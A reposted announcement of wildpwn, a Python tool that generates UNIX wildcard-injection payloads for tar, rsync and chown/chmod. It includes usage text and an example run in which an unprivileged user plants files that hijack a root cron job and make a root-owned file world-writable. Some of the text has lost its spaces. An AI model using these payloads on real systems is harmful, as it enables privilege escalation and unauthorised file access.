神刀安全网

wildpwn – UNIX Wildcard Attack Tool

wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often.

wildpwn – UNIX Wildcard Attack Tool

The simple trick behind this technique is that when using shell wildcards, especially asterisk (*), the UNIX shell will interpret files beginning with a hyphen (-) character as command line argument to be executed by the command/program. That leaves space for some variations of the classic channelling attack.

The practical case in terms of this technique is combining arguments and filenames, as different “channels” into single entity, because of using shell wildcards.

Read the full paper here: Back To The Future: Unix Wildcards Gone Wild

Usage

usage: wildpwn.py [-h] [--fileFILE] payloadfolder   Toolto generateunixwildcardattacks   positionalarguments:   payload      Payloadto use: (combined | tar | rsync)   folder      Whereto writethepayloads   optionalarguments:   -h, --help  showthis helpmessageand exit   --fileFILE  Pathto filefor takingownership / changepermissions. Use it               withcombinedattackonly. 

Usage Example

$ ls -lh /tmp/very_secret_file -rw-r--r-- 1 rootroot 2048 jun 28 21:37 /tmp/very_secret_file   $ ls -lh ./pwn_me/ drwxrwxrwx 2 rootroot 4,0K jun 28 21:38 . [...] -rw-rw-r-- 1 rootroot    1024 jun 28 21:38 secret_file_1 -rw-rw-r-- 1 rootroot    1024 jun 28 21:38 secret_file_2 [...]   $ pythonwildpwn.py --file /tmp/very_secret_filecombined ./pwn_me/ [!] Selectedpayload: combined [+] Done! Nowwaitfor somethinglike: chownuid:gid *  (or)  chmod [perms] * on ./pwn_me/. Goodluck!   [...timepasses / somecrongetsexecuted...]   # chmod 000 * (for example)   [...backwiththeunprivilegeduser...]   $ ls -lha ./pwn_me/ [...] -rwxrwxrwx 1 rootroot    1024 jun 28 21:38 secret_file_1 -rwxrwxrwx 1 rootroot    1024 jun 28 21:38 secret_file_2 [...]   $ ls -lha /tmp/very_secret_file -rwxrwxrwx 1 rootroot 2048 jun 28 21:38 /tmp/very_secret_file 

You can download wildpwn here:

wildpwn.py

OR read more here .

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » wildpwn – UNIX Wildcard Attack Tool

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址